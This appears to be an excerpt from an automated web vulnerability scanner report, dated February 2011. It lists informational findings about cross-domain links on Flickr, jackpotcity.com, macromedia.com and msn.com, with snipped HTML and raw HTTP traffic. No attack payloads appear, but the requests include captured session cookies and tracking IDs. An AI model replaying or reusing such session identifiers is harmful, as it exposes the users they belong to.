<link href="http://l.yimg.com/g/css/c_info.css.v87754.17" rel="stylesheet" type="text/css" />
<link href="http://l.yimg.com/g/css/c_search.css.v76715.17" rel="stylesheet" type="text/css" />
<link href="http://l.yimg.com/g/css/c_explore_search.css.v99128.17" rel="stylesheet" type="text/css" />


<!--[if LT IE 7]>
...[SNIP]...
</script>
<script type="text/javascript" src="http://l.yimg.com/g/javascript/global.js.v93276.17"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://l.yimg.com/g/javascript/fold_main.js.v48851.48851.48851.48851.48851.38771.48851.48851.99272.84182.86949.86949.62864.38771.66362.84183.84152.69832.38771.84694.38771.88197.84182.98826.98920.99014.17"></script>

<script type="text/javascript" src="http://l.yimg.com/g/javascript/s_output_en-us.js.e02f3c9e0daa4639d1f9c385d44d3918"></script>
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://l.yimg.com/g/javascript/search.js.v84157.17"></script>
<script type="text/javascript" src="http://l.yimg.com/g/javascript/explore_search.js.v99238.17"></script>
<script type="text/javascript" src="http://l.yimg.com/g/javascript/yahoo/history_2.6.0.js.v61045.17"></script>
...[SNIP]...
<div id="beacon"><img src="http://geo.yahoo.com/f?s=792600186&t=879ee77f43305e085029d5080d90b953&fl_ev=0&lang=en&intl=us&sview=t&sscope=all&spage=0&sadv=f&sver=2.0" width="0" height="0" alt="" /></div>
...[SNIP]...
<a href="/"><img src="http://l.yimg.com/g/images/en-us/flickr-yahoo-logo.png.v3" id="FlickrLogo" width="180" height="30" alt="Flickr logo. If you click it, you'll go home"></a>
...[SNIP]...
</a> <img src="http://l.yimg.com/g/images/site_nav_caret_split_default.png" class="nav_button_caret" width="18" height="15" alt="More options"></span>
...[SNIP]...
</a> <img src="http://l.yimg.com/g/images/site_nav_caret_split_default.png" class="nav_button_caret" width="18" height="15" alt="More options"></span>
...[SNIP]...
</div>
           
               <img src="http://l.yimg.com/g/images/spaceout.gif" alt="" class="search-minwidth-ie" />
           
   </div>
...[SNIP]...
<a href="/photos/kqf/285023151/" onclick="return F.explore_search.show_detail(this,event,'285023151')" title="More information" class="search-moreinfo search-moreinfo-small" style="margin-right:8px"><img src="http://l.yimg.com/g/images/spaceout.gif" /></a>
...[SNIP]...
<a href="/photos/kqf/285023194/" onclick="return F.explore_search.show_detail(this,event,'285023194')" title="More information" class="search-moreinfo search-moreinfo-small" style="margin-right:8px"><img src="http://l.yimg.com/g/images/spaceout.gif" /></a>
...[SNIP]...
"/photos/davepolaschek/434961556/" onclick="return F.explore_search.show_detail(this,event,'434961556')" title="More information" class="search-moreinfo search-moreinfo-small" style="margin-right:8px"><img src="http://l.yimg.com/g/images/spaceout.gif" /></a>
...[SNIP]...
f="/photos/tucows/2088362387/" onclick="return F.explore_search.show_detail(this,event,'2088362387')" title="More information" class="search-moreinfo search-moreinfo-small" style="margin-right:20.5px"><img src="http://l.yimg.com/g/images/spaceout.gif" /></a>
...[SNIP]...
f="/photos/tucows/2088362449/" onclick="return F.explore_search.show_detail(this,event,'2088362449')" title="More information" class="search-moreinfo search-moreinfo-small" style="margin-right:20.5px"><img src="http://l.yimg.com/g/images/spaceout.gif" /></a>
...[SNIP]...
"/photos/davepolaschek/289501631/" onclick="return F.explore_search.show_detail(this,event,'289501631')" title="More information" class="search-moreinfo search-moreinfo-small" style="margin-right:8px"><img src="http://l.yimg.com/g/images/spaceout.gif" /></a>
...[SNIP]...
f="/photos/tucows/1484982156/" onclick="return F.explore_search.show_detail(this,event,'1484982156')" title="More information" class="search-moreinfo search-moreinfo-small" style="margin-right:20.5px"><img src="http://l.yimg.com/g/images/spaceout.gif" /></a>
...[SNIP]...
="/photos/danejasper/1627629279/" onclick="return F.explore_search.show_detail(this,event,'1627629279')" title="More information" class="search-moreinfo search-moreinfo-small" style="margin-right:8px"><img src="http://l.yimg.com/g/images/spaceout.gif" /></a>
...[SNIP]...
"/photos/davepolaschek/289535811/" onclick="return F.explore_search.show_detail(this,event,'289535811')" title="More information" class="search-moreinfo search-moreinfo-small" style="margin-right:8px"><img src="http://l.yimg.com/g/images/spaceout.gif" /></a>
...[SNIP]...
tos/davepolaschek/1057064592/" onclick="return F.explore_search.show_detail(this,event,'1057064592')" title="More information" class="search-moreinfo search-moreinfo-small" style="margin-right:24.5px"><img src="http://l.yimg.com/g/images/spaceout.gif" /></a>
...[SNIP]...
photos/davepolaschek/1472163888/" onclick="return F.explore_search.show_detail(this,event,'1472163888')" title="More information" class="search-moreinfo search-moreinfo-small" style="margin-right:8px"><img src="http://l.yimg.com/g/images/spaceout.gif" /></a>
...[SNIP]...
hotos/davepolaschek/531441338/" onclick="return F.explore_search.show_detail(this,event,'531441338')" title="More information" class="search-moreinfo search-moreinfo-small" style="margin-right:24.5px"><img src="http://l.yimg.com/g/images/spaceout.gif" /></a>
...[SNIP]...
"/photos/davepolaschek/421017929/" onclick="return F.explore_search.show_detail(this,event,'421017929')" title="More information" class="search-moreinfo search-moreinfo-small" style="margin-right:8px"><img src="http://l.yimg.com/g/images/spaceout.gif" /></a>
...[SNIP]...
photos/davepolaschek/1743945693/" onclick="return F.explore_search.show_detail(this,event,'1743945693')" title="More information" class="search-moreinfo search-moreinfo-small" style="margin-right:8px"><img src="http://l.yimg.com/g/images/spaceout.gif" /></a>
...[SNIP]...
"/photos/davepolaschek/568749612/" onclick="return F.explore_search.show_detail(this,event,'568749612')" title="More information" class="search-moreinfo search-moreinfo-small" style="margin-right:8px"><img src="http://l.yimg.com/g/images/spaceout.gif" /></a>
...[SNIP]...
photos/davepolaschek/3019194960/" onclick="return F.explore_search.show_detail(this,event,'3019194960')" title="More information" class="search-moreinfo search-moreinfo-small" style="margin-right:8px"><img src="http://l.yimg.com/g/images/spaceout.gif" /></a>
...[SNIP]...
photos/davepolaschek/3070912348/" onclick="return F.explore_search.show_detail(this,event,'3070912348')" title="More information" class="search-moreinfo search-moreinfo-small" style="margin-right:8px"><img src="http://l.yimg.com/g/images/spaceout.gif" /></a>
...[SNIP]...
photos/davepolaschek/1551613604/" onclick="return F.explore_search.show_detail(this,event,'1551613604')" title="More information" class="search-moreinfo search-moreinfo-small" style="margin-right:8px"><img src="http://l.yimg.com/g/images/spaceout.gif" /></a>
...[SNIP]...
photos/davepolaschek/4031857698/" onclick="return F.explore_search.show_detail(this,event,'4031857698')" title="More information" class="search-moreinfo search-moreinfo-small" style="margin-right:8px"><img src="http://l.yimg.com/g/images/spaceout.gif" /></a>
...[SNIP]...
a href="/photos/smcgee/470729177/" onclick="return F.explore_search.show_detail(this,event,'470729177')" title="More information" class="search-moreinfo search-moreinfo-small" style="margin-right:8px"><img src="http://l.yimg.com/g/images/spaceout.gif" /></a>
...[SNIP]...
a href="/photos/smcgee/470729789/" onclick="return F.explore_search.show_detail(this,event,'470729789')" title="More information" class="search-moreinfo search-moreinfo-small" style="margin-right:8px"><img src="http://l.yimg.com/g/images/spaceout.gif" /></a>
...[SNIP]...
a href="/photos/smcgee/470709992/" onclick="return F.explore_search.show_detail(this,event,'470709992')" title="More information" class="search-moreinfo search-moreinfo-small" style="margin-right:8px"><img src="http://l.yimg.com/g/images/spaceout.gif" /></a>
...[SNIP]...
"/photos/davepolaschek/602175416/" onclick="return F.explore_search.show_detail(this,event,'602175416')" title="More information" class="search-moreinfo search-moreinfo-small" style="margin-right:8px"><img src="http://l.yimg.com/g/images/spaceout.gif" /></a>
...[SNIP]...
photos/gustavosoares/1497095722/" onclick="return F.explore_search.show_detail(this,event,'1497095722')" title="More information" class="search-moreinfo search-moreinfo-small" style="margin-right:8px"><img src="http://l.yimg.com/g/images/spaceout.gif" /></a>
...[SNIP]...
<a href="/photos/kqf/285023110/" onclick="return F.explore_search.show_detail(this,event,'285023110')" title="More information" class="search-moreinfo search-moreinfo-small" style="margin-right:8px"><img src="http://l.yimg.com/g/images/spaceout.gif" /></a>
...[SNIP]...
"/photos/nikooru_niamh/320980277/" onclick="return F.explore_search.show_detail(this,event,'320980277')" title="More information" class="search-moreinfo search-moreinfo-small" style="margin-right:8px"><img src="http://l.yimg.com/g/images/spaceout.gif" /></a>
...[SNIP]...
"/photos/nikooru_niamh/320980276/" onclick="return F.explore_search.show_detail(this,event,'320980276')" title="More information" class="search-moreinfo search-moreinfo-small" style="margin-right:8px"><img src="http://l.yimg.com/g/images/spaceout.gif" /></a>
...[SNIP]...
<a href="/photos/kqf/285023215/" onclick="return F.explore_search.show_detail(this,event,'285023215')" title="More information" class="search-moreinfo search-moreinfo-small" style="margin-right:8px"><img src="http://l.yimg.com/g/images/spaceout.gif" /></a>
...[SNIP]...
tos/gustavosoares/1496239669/" onclick="return F.explore_search.show_detail(this,event,'1496239669')" title="More information" class="search-moreinfo search-moreinfo-small" style="margin-right:20.5px"><img src="http://l.yimg.com/g/images/spaceout.gif" /></a>
...[SNIP]...
photos/gustavosoares/1497096042/" onclick="return F.explore_search.show_detail(this,event,'1497096042')" title="More information" class="search-moreinfo search-moreinfo-small" style="margin-right:8px"><img src="http://l.yimg.com/g/images/spaceout.gif" /></a>
...[SNIP]...
"/photos/nikooru_niamh/320980278/" onclick="return F.explore_search.show_detail(this,event,'320980278')" title="More information" class="search-moreinfo search-moreinfo-small" style="margin-right:8px"><img src="http://l.yimg.com/g/images/spaceout.gif" /></a>
...[SNIP]...
"/photos/nikooru_niamh/320980274/" onclick="return F.explore_search.show_detail(this,event,'320980274')" title="More information" class="search-moreinfo search-moreinfo-small" style="margin-right:8px"><img src="http://l.yimg.com/g/images/spaceout.gif" /></a>
...[SNIP]...
tos/gustavosoares/1497096608/" onclick="return F.explore_search.show_detail(this,event,'1497096608')" title="More information" class="search-moreinfo search-moreinfo-small" style="margin-right:20.5px"><img src="http://l.yimg.com/g/images/spaceout.gif" /></a>
...[SNIP]...
photos/davepolaschek/1634372484/" onclick="return F.explore_search.show_detail(this,event,'1634372484')" title="More information" class="search-moreinfo search-moreinfo-small" style="margin-right:8px"><img src="http://l.yimg.com/g/images/spaceout.gif" /></a>
...[SNIP]...
ref="/photos/smcgee/470729495/" onclick="return F.explore_search.show_detail(this,event,'470729495')" title="More information" class="search-moreinfo search-moreinfo-small" style="margin-right:24.5px"><img src="http://l.yimg.com/g/images/spaceout.gif" /></a>
...[SNIP]...
"/photos/davepolaschek/467694337/" onclick="return F.explore_search.show_detail(this,event,'467694337')" title="More information" class="search-moreinfo search-moreinfo-small" style="margin-right:8px"><img src="http://l.yimg.com/g/images/spaceout.gif" /></a>
...[SNIP]...
photos/accordionguy/502306314/" onclick="return F.explore_search.show_detail(this,event,'502306314')" title="More information" class="search-moreinfo search-moreinfo-small" style="margin-right:20.5px"><img src="http://l.yimg.com/g/images/spaceout.gif" /></a>
...[SNIP]...
a href="/photos/smcgee/470707912/" onclick="return F.explore_search.show_detail(this,event,'470707912')" title="More information" class="search-moreinfo search-moreinfo-small" style="margin-right:8px"><img src="http://l.yimg.com/g/images/spaceout.gif" /></a>
...[SNIP]...
a href="/photos/smcgee/470708374/" onclick="return F.explore_search.show_detail(this,event,'470708374')" title="More information" class="search-moreinfo search-moreinfo-small" style="margin-right:8px"><img src="http://l.yimg.com/g/images/spaceout.gif" /></a>
...[SNIP]...
href="/photos/oac/2048434770/" onclick="return F.explore_search.show_detail(this,event,'2048434770')" title="More information" class="search-moreinfo search-moreinfo-small" style="margin-right:19.5px"><img src="http://l.yimg.com/g/images/spaceout.gif" /></a>
...[SNIP]...
iketearsintherain/3986066588/" onclick="return F.explore_search.show_detail(this,event,'3986066588')" title="More information" class="search-moreinfo search-moreinfo-small" style="margin-right:24.5px"><img src="http://l.yimg.com/g/images/spaceout.gif" /></a>
...[SNIP]...
<a href="/photos/kqf/285023317/" onclick="return F.explore_search.show_detail(this,event,'285023317')" title="More information" class="search-moreinfo search-moreinfo-small" style="margin-right:8px"><img src="http://l.yimg.com/g/images/spaceout.gif" /></a>
...[SNIP]...
<a href="/photos/kqf/285023281/" onclick="return F.explore_search.show_detail(this,event,'285023281')" title="More information" class="search-moreinfo search-moreinfo-small" style="margin-right:8px"><img src="http://l.yimg.com/g/images/spaceout.gif" /></a>
...[SNIP]...
<a href="/photos/kqf/285023337/" onclick="return F.explore_search.show_detail(this,event,'285023337')" title="More information" class="search-moreinfo search-moreinfo-small" style="margin-right:8px"><img src="http://l.yimg.com/g/images/spaceout.gif" /></a>
...[SNIP]...
<a href="/photos/kqf/285023239/" onclick="return F.explore_search.show_detail(this,event,'285023239')" title="More information" class="search-moreinfo search-moreinfo-small" style="margin-right:8px"><img src="http://l.yimg.com/g/images/spaceout.gif" /></a>
...[SNIP]...
s/liketearsintherain/3985302429/" onclick="return F.explore_search.show_detail(this,event,'3985302429')" title="More information" class="search-moreinfo search-moreinfo-small" style="margin-right:8px"><img src="http://l.yimg.com/g/images/spaceout.gif" /></a>
...[SNIP]...
s/liketearsintherain/3985306399/" onclick="return F.explore_search.show_detail(this,event,'3985306399')" title="More information" class="search-moreinfo search-moreinfo-small" style="margin-right:8px"><img src="http://l.yimg.com/g/images/spaceout.gif" /></a>
...[SNIP]...
="/photos/16517728@N00/194190250/" onclick="return F.explore_search.show_detail(this,event,'194190250')" title="More information" class="search-moreinfo search-moreinfo-small" style="margin-right:8px"><img src="http://l.yimg.com/g/images/spaceout.gif" /></a>
...[SNIP]...
<a href="/photos/jameskoole/2400237127/" class="pc_link" id="stewart_swf2400237127_trigger_a" title="Play Video"><img src="http://l.yimg.com/g/images/video_play_icon_small.png.v1" width="11" height="11" alt="" class="trans_png"></a>
...[SNIP]...
="/photos/jameskoole/2400237127/" onclick="return F.explore_search.show_detail(this,event,'2400237127')" title="More information" class="search-moreinfo search-moreinfo-small" style="margin-right:8px"><img src="http://l.yimg.com/g/images/spaceout.gif" /></a>
...[SNIP]...
photos/16517728@N00/194190252/" onclick="return F.explore_search.show_detail(this,event,'194190252')" title="More information" class="search-moreinfo search-moreinfo-small" style="margin-right:20.5px"><img src="http://l.yimg.com/g/images/spaceout.gif" /></a>
...[SNIP]...
s/liketearsintherain/3985303443/" onclick="return F.explore_search.show_detail(this,event,'3985303443')" title="More information" class="search-moreinfo search-moreinfo-small" style="margin-right:8px"><img src="http://l.yimg.com/g/images/spaceout.gif" /></a>
...[SNIP]...
s/liketearsintherain/3986055838/" onclick="return F.explore_search.show_detail(this,event,'3986055838')" title="More information" class="search-moreinfo search-moreinfo-small" style="margin-right:8px"><img src="http://l.yimg.com/g/images/spaceout.gif" /></a>
...[SNIP]...
="/photos/16517728@N00/194190251/" onclick="return F.explore_search.show_detail(this,event,'194190251')" title="More information" class="search-moreinfo search-moreinfo-small" style="margin-right:8px"><img src="http://l.yimg.com/g/images/spaceout.gif" /></a>
...[SNIP]...
iketearsintherain/3986052810/" onclick="return F.explore_search.show_detail(this,event,'3986052810')" title="More information" class="search-moreinfo search-moreinfo-small" style="margin-right:20.5px"><img src="http://l.yimg.com/g/images/spaceout.gif" /></a>
...[SNIP]...
s/liketearsintherain/3986051562/" onclick="return F.explore_search.show_detail(this,event,'3986051562')" title="More information" class="search-moreinfo search-moreinfo-small" style="margin-right:8px"><img src="http://l.yimg.com/g/images/spaceout.gif" /></a>
...[SNIP]...
s/liketearsintherain/3986060540/" onclick="return F.explore_search.show_detail(this,event,'3986060540')" title="More information" class="search-moreinfo search-moreinfo-small" style="margin-right:8px"><img src="http://l.yimg.com/g/images/spaceout.gif" /></a>
...[SNIP]...
s/liketearsintherain/3985305705/" onclick="return F.explore_search.show_detail(this,event,'3985305705')" title="More information" class="search-moreinfo search-moreinfo-small" style="margin-right:8px"><img src="http://l.yimg.com/g/images/spaceout.gif" /></a>
...[SNIP]...
="/photos/16517728@N00/194190253/" onclick="return F.explore_search.show_detail(this,event,'194190253')" title="More information" class="search-moreinfo search-moreinfo-small" style="margin-right:8px"><img src="http://l.yimg.com/g/images/spaceout.gif" /></a>
...[SNIP]...
s/liketearsintherain/3985304987/" onclick="return F.explore_search.show_detail(this,event,'3985304987')" title="More information" class="search-moreinfo search-moreinfo-small" style="margin-right:8px"><img src="http://l.yimg.com/g/images/spaceout.gif" /></a>
...[SNIP]...
href="/photos/guym/884808839/" onclick="return F.explore_search.show_detail(this,event,'884808839')" title="More information" class="search-moreinfo search-moreinfo-small" style="margin-right:20.5px"><img src="http://l.yimg.com/g/images/spaceout.gif" /></a>
...[SNIP]...
</div>
       
               <img src="http://l.yimg.com/g/images/spaceout.gif" alt="" class="search-minwidth-ie" />
   
   
                   <div id="ajax_pagination">
...[SNIP]...
<div id="SearchHouseAd" style="margin-bottom:8px">

                       <iframe src="http://adjax.flickr.yahoo.com/ads/792600186/LREC/" width="302" height="265" scrolling="no" frameborder="0" marginwidth="0" marginheight="0"></iframe>
...[SNIP]...
<a href="/photos/jay_que/1834540/"><img src="http://l.yimg.com/g/images/jay_que_1834540.png" width="24" height="24" alt="bridge and fog" /></a>
...[SNIP]...
<p class="pivot_title">
                                   Looking to license an image? You can search through the treasure trove of <a href="http://www.gettyimages.com/search/2/image?esource=en-us&family=creative&brands=FKM%2CFKF%2CFKS&phrase=squishycow">Flickr members</a>
...[SNIP]...
<a href="/places/United+States/Minnesota/Minneapolis"><img src="http://l.yimg.com/g/images/geo_cont_north_america.gif" alt="north_america" width="24" height="24"></a>
...[SNIP]...
<a href="/places/Canada/Ontario/Waterloo"><img src="http://l.yimg.com/g/images/geo_cont_north_america.gif" alt="north_america" width="24" height="24"></a>
...[SNIP]...
<a href="/places/United+States/Minnesota/Bar+Code"><img src="http://l.yimg.com/g/images/geo_cont_north_america.gif" alt="north_america" width="24" height="24"></a>
...[SNIP]...
<a href="/places/Canada/Ontario/Toronto"><img src="http://l.yimg.com/g/images/geo_cont_north_america.gif" alt="north_america" width="24" height="24"></a>
...[SNIP]...
<div class="Delicious">
<a href="http://delicious.com/save"
onclick="window.open('http://delicious.com/save?partner=flickr&amp;v=5&amp;noui&amp;jump=close&amp;url='+encodeURIComponent(location.href)+'&amp;title='+encodeURIComponent(document.title), 'delicious','toolbar=no,width=550,height=550'); return false;">
<img src="http://l.yimg.com/g/images/spaceout.gif" width="10" height="10" class="f-sprite fs-add_to_delicious" alt=""> &nbsp;Bookmark on Delicious</a>
...[SNIP]...
</a> |
       <a href="http://info.yahoo.com/relevantads" target="_blank">About Our Ads</a> |        <a href="http://docs.yahoo.com/info/copyright/copyright.html" target="_blank">Copyright/IP Policy</a>
...[SNIP]...
<a href="/change_language.gne?lang=zh-hk&magic_cookie=07bf47744f3480ad189acaf16fe652eb" class="image_link" id="lang_zh-hk"><img src="http://l.yimg.com/g/images/spaceout.gif" width="45" height="13" id="langselect_zh-hk" alt="............"></a>
...[SNIP]...
<a href="/change_language.gne?lang=ko-kr&magic_cookie=07bf47744f3480ad189acaf16fe652eb" class="image_link" id="lang_ko-kr"><img src="http://l.yimg.com/g/images/spaceout.gif" width="23" height="13" id="langselect_ko-kr" alt="......"></a>
...[SNIP]...
</div>


   <script src="http://us.adserver.yahoo.com/a?f=792600186&p=flickr&l=FOOT9&c=r"></script>
...[SNIP]...

18.122. http://www.jackpotcity.com/exit/flashcasino/tracking.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jackpotcity.com
Path:   /exit/flashcasino/tracking.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /exit/flashcasino/tracking.aspx?eventid=30353 HTTP/1.1
Host: www.jackpotcity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCH=JPC; FCVR=1412626858; __utmz=26101158.1296765008.1.1.utmccn=(referral)|utmcsr=thumbshots.com|utmcct=/Support.aspx|utmcmd=referral; __utma=26101158.471062058.1296765008.1296765008.1296765008.1; __utmc=26101158; __utmb=26101158; ASP.NET_SessionId=wa3qlqzjtebv1q45odolquvj;

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: https://jackpotcity.gameassists.co.uk/jackpotcity/Default.ASP?BTAG=403479002&gameid=
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 21:56:13 GMT
Connection: close
Content-Length: 205

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://jackpotcity.gameassists.co.uk/jackpotcity/Default.ASP?BTAG=403479002&amp;gameid=">here</a>.</h2>
</body></ht
...[SNIP]...

18.123. http://www.macromedia.com/shockwave/download/index.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.macromedia.com
Path:   /shockwave/download/index.cgi

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash HTTP/1.1
Host: www.macromedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 03 Feb 2011 22:02:19 GMT
Server: Apache
Location: http://www.adobe.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash
Content-Length: 288
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.adobe.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash">here</a>
...[SNIP]...

18.124. http://www.msn.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msn.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?euid=AD04D6F8B2FF44629973BD0674351135&userGroup=W:default&PM=z:1 HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://www.msn.com/
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: www.msn.com
Proxy-Connection: Keep-Alive
Cookie: MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; Sample=63; MUID=AD04D6F8B2FF44629973BD0674351135; VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; stvx=gendermodule:forher; expac=813II6a37_1229:C~126II4a36_0830:WP10_4~271II8B37_0107:C|; SVWCUK200=406199_1

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 02:29:47 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPRENA42
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 44661
Content-Length: 44661

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><body><d
...[SNIP]...
<div class="link"><a href="http://www.bing.com/search?q=February+3&amp;mkt=en-us&amp;FORM=MSNHPT">Thursday, February 3, 2011</a>
...[SNIP]...
<a href="http://bltwy.msnbc.msn.com/politics/mubarak-and-the-billionaires-club-9429.gallery?photoId=37364&amp;gt1=43001"><img src="http://col.stb.s-msn.com/i/13/F22BBB0623B642F8FBE87EDD89DF.jpg" title="Image: (From left) Saudi King Abdullah bin Abdul Aziz al-Saud, Italian Prime Minister Silvio Berlusconi, Thailand's King Bhumibol &amp; Egyptian President Hosni Mubarak (.. Hassan Ammar/Getty Images; Giorgio Cosulich/Getty Images; AP; Charles Dharapak/AP)" width="303" height="211" alt="Image: (From left) Saudi King Abdullah bin Abdul Aziz al-Saud, Italian Prime Minister Silvio Berlusconi, Thailand's King Bhumibol &amp; Egyptian President Hosni Mubarak (.. Hassan Ammar/Getty Images; Giorgio Cosulich/Getty Images; AP; Charles Dharapak/AP)" /></a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=richest+american+politicians&amp;go=&amp;form=msnhal">Bing: Richest American politicians</a>
...[SNIP]...
<a href="http://wonderwall.msn.com/tv/celebrity-yearbook-portraits-10886.gallery?GT1=28135"><img src="http://col.stb.s-msn.com/i/B1/2B8AD04B3F602EE54F1A303DB44C92.jpg" title="Image: Celebrity yearbook photos (Photos courtesy of Wonderwall)" width="303" height="211" alt="Image: Celebrity yearbook photos (Photos courtesy of Wonderwall)" /></a>
...[SNIP]...
<a href="http://fitbie.msn.com/get-fit/tips/6-hard-body-winter-sports?gt1=50007"><img src="http://col.stb.s-msn.com/i/E0/758C119EFAC1460E86BB68B70BCB9.jpg" title="Image: Group of people snowshoeing (.. Jupiterimages/Comstock Images/Getty Images)" width="303" height="211" alt="Image: Group of people snowshoeing (.. Jupiterimages/Comstock Images/Getty Images)" /></a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=best+indoor+exercise&amp;form=msnhed&amp;gt1=36010">Bing: Best indoor exercises to keep you in shape</a>
...[SNIP]...
<a href="http://businessonmain.msn.com/browseresources/articles/managingemployees.aspx?cp-documentid=26869518&amp;source=msneditorial&amp;GT1=25049"><img src="http://col.stb.s-msn.com/i/6D/2FF26F241DDE4756F014B115988B7C.jpg" title="Image: Employee looking into manager's office (.. Uppercut Images/Getty Images)" width="303" height="211" alt="Image: Employee looking into manager's office (.. Uppercut Images/Getty Images)" /></a>
...[SNIP]...
<span><a href="http://www.bing.com/videos/watch/video/twilight-landing-at-lax/20y574pu?q=Airplane&amp;rel=msn&amp;from=en-us_msnhp&amp;form=msnrll&amp;gt1=42010">Watch: Beautiful Twilight Landing at LAX</a></span><a href="http://www.bing.com/videos/watch/video/twilight-landing-at-lax/20y574pu?q=Airplane&amp;rel=msn&amp;from=en-us_msnhp&amp;form=msnrll&amp;gt1=42010"><img src="http://col.stb.s-msn.com/i/11/4570382D664636AD362CD03941E089.jpg" title="Image: Video still of LAX approach (Courtesy of StupidVideos)" width="619" height="177" alt="Image: Video still of LAX approach (Courtesy of StupidVideos)" /></a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba/story/New-York-Knicks-fined-200-thousand-dollars-for-illegal-draft-workouts-020311/?gt1=39002">Knicks fined for illegal workouts</a>
...[SNIP]...
<a href="http://ingame.msnbc.msn.com/_news/2011/02/03/5983962-game-playing-kid-falls-onto-subway-tracks&amp;GT1=43001"><img class="landscape" src="http://col.stb.s-msn.com/i/5E/7CEDB1382E1C3826451C91C4CF6C75.jpg" title="Image: Video still of boy falling onto subway tracks while playing video game (Courtesy of MSNBC)" width="303" height="117" alt="Image: Video still of boy falling onto subway tracks while playing video game (Courtesy of MSNBC)" /></a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=SI+Swimsuit+Issue+Beaches%3a+Shark+Bay%2c+Australia&amp;cid=msn1177229&amp;FORM=TRVCON&amp;gt1=41000">23 hot SI swimsuit-issue beaches</a>
...[SNIP]...
<li class="ter media"><a href="http://www.bing.com/videos/watch/video/weatherman-freaks-over-thundersnow-in-chicago-blizzard/201tfk0a?q=Chicago+Snow&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNRLL&amp;gt1=42007">Chicago weatherman freaks out</a>
...[SNIP]...
<div style="float:right;width:116px"><a href="http://www.bing.com/videos/watch/video/audrina-patridges-sexy-bikini-ad/17w4fh6jc?q=Audrina+Patridge&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNRLL&amp;gt1=42008"><img class="portrait" src="http://col.stb.s-msn.com/i/FB/9469D127E8F73F3291401B8A908411.jpg" title="Image: Video still of Audrina Patridge (.. E! Entertainment)" width="116" height="175" alt="Image: Video still of Audrina Patridge (.. E! Entertainment)" /></a></div><div style="margin-right:116px; padding-right: 10px;"><a href="http://www.bing.com/videos/watch/video/audrina-patridges-sexy-bikini-ad/17w4fh6jc?q=Audrina+Patridge&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNRLL&amp;gt1=42008">Audrina Patridge's sexy bikini ad</a>
...[SNIP]...
<p>The former 'Hills' star flashes some serious skin in a <a href="http://www.bing.com/videos/watch/video/audrina-patridges-sexy-bikini-ad/17w4fh6jc?q=Audrina+Patridge&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNRLL&amp;gt1=42008">tiny black two-piece</a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.bing.com/videos/watch/video/year-of-the-rabbit/ufqmygeb?q=Chinese+New+Year&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNRLL&amp;gt1=42007"><img class="landscape" src="http://col.stb.s-msn.com/i/6E/163C59D817A81D6F5CB89396D935C2.jpg" title="Image: Video still of rabbit in costume (.. U-Zoo)" width="128" height="73" alt="Image: Video still of rabbit in costume (.. U-Zoo)" /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/videos/watch/video/year-of-the-rabbit/ufqmygeb?q=Chinese+New+Year&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNRLL&amp;gt1=42007"><strong>
...[SNIP]...
<p>These bunnies are basking in their <a href="http://www.bing.com/videos/watch/video/year-of-the-rabbit/ufqmygeb?q=Chinese+New+Year&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNRLL&amp;gt1=42007">'Year of the Rabbit' glory</a>
